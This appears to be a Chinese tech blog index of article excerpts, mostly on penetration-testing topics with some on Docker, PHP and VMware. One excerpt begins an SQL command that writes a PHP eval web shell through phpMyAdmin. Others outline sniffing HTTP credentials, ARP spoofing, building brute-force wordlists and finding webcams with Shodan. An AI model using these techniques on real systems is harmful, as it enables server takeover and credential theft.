原创 逆向之整數溢出漏洞

逆向之整數溢出漏洞 溢出漏洞的簡介 溢出漏洞的概念:   溢出是黑客利用程序的漏洞,專門開發的一種程序,加相應的參數運行後,就可以達到某種目的。溢出是程序設計者設計時的不足所帶來的錯誤 溢出的類型:   溢出分爲緩衝區溢出、 內存溢

原创 windows中echo的用法

windows中echo的用法 tree 1.echo:顯示信息 echo hello 執行顯示: hello 2.echo on/off:開/關回顯功能 如果將@echo off放最前面,將不會顯示所有命令本身,只顯示輸出結果

原创 通過phpMyAdmin寫入MySQL,獲取webshell

通過phpMyAdmin寫入MySQL,獲取webshell 在SQL的控制檯中輸入 進入http://127.0.0.1/phpMyAdmin,並在SQL中輸入如下命令 select '<?php @eval($_POST[1]);

原创 底部小魚特效

底部小魚特效 頁面定製 CSS 代碼  .container { width: 100%; height: 200px; position: fixed; z-index: -1; opacit

原创 kali Linux的簡單介紹

kali Linux的簡單介紹 Kali Linux是基於Debian 的Linux發行版,設計用於數字取證操作系統。Back Track是他們之前寫的用於取證的Linux發行版。Kali Linux預裝了許多滲滲透測試軟件,包括nmap

原创 利用kali生成字典的三種方式

利用kali生成字典的三種方式 字典是記錄一些特殊或有目的性的密碼集合,通常以txt格式進行記錄保存。在滲透許多服務器、smb、ftp、ssh、遠程桌面rdp、網頁後臺等一些用戶登錄時,沒有正確密碼,使用密碼字典爆破就是最直接的黑客攻擊方法

原创 利用kali嗅探HTTP網頁用戶賬戶密碼

利用kali嗅探HTTP網頁用戶賬戶密碼 嗅探HTTP網頁 一:測試基礎 1.ARP基礎:使用mac地址和ip地址進行通信的局域網協議2.HTTP:一種上網、網頁請求通信協議。該協議以明文傳輸,即在傳輸時不對數據進行加密,因爲http的不安

原创 利用kali中的shodan查看網絡攝像頭

利用kali中的shodan查看網絡攝像頭 實戰: 1.瀏覽器輸入shodan.io 創建一個免費賬戶。 2.點擊郵箱鏈接進行驗證3.返回網頁進行登錄,並複製密鑰 4.打開滲透利用框架 msfconsole 5.搜索shodan

原创 如何使用最新Microsoft Edge打開Flash頁面

如何使用最新Microsoft Edge打開Flash頁面 使用最新版本的IE瀏覽器無法打開flash相關的頁面,有關最新版本的谷歌內核相關瀏覽器都出現相關問題.flash的設置都找不到. 以下是解決最新IE瀏覽器打開flash的方法,僅供

原创 AWVS工具站點掃描-基礎知識點

AWVS工具站點掃描--基礎知識點 自動化的web掃描工具 基本使用 http請求包   http請求方法 http---GET請求頭     http響應體 模糊測試執行過程     Sniffer工具   SQL注入 fi

原创 PHP+mysql的登陸與註冊

PHP+mysql的登陸與註冊 圖1:圖2:圖3:教程:實現這個功能我們需要五個php文件: login.php(登錄界面,如圖2) <!DOCTYPE html> <html><head> <title>登錄</title> <meta

原创 Docker學習筆記02

Docker學習筆記02 Docker鏡像講解 鏡像是什麼 鏡像是一種輕量級,可執行的獨立軟件,用來打包軟件運行環境和基於運行環境開發的軟件,他包含運行某個軟件所需的所有內容,包括代碼、運行環境、庫、環境變量和配置文件。 所有的應用,直接打

原创 FusionInsight大數據開發---Flink應用開發

FusionInsight大數據開發---Flink應用開發    

原创 Vmware中橋接模式連不上網但是net模式可以解決方法

Vmware中橋接模式連不上網但是net模式可以解決方法 首先看一下自己的虛擬網卡的配置:    然後再到Vmware的網絡配置中設置一下橋接模式的網卡配置  這裏大家先選擇一下 wifi網卡的設置,發現並沒有啥用,然後再選擇自動橋接,

原创 ARP地址欺騙

ARP地址欺騙 Arp欺騙攻擊 利用ARP協議的缺陷進行的一種非法攻擊 ARP協議 地址解析協議,將IP地址轉換爲對應的mac地址,屬鏈路層協議數據包分爲: 請求包(廣播):本機IP地址、mac地址+目標主機IP地址 應答包(單播):本機I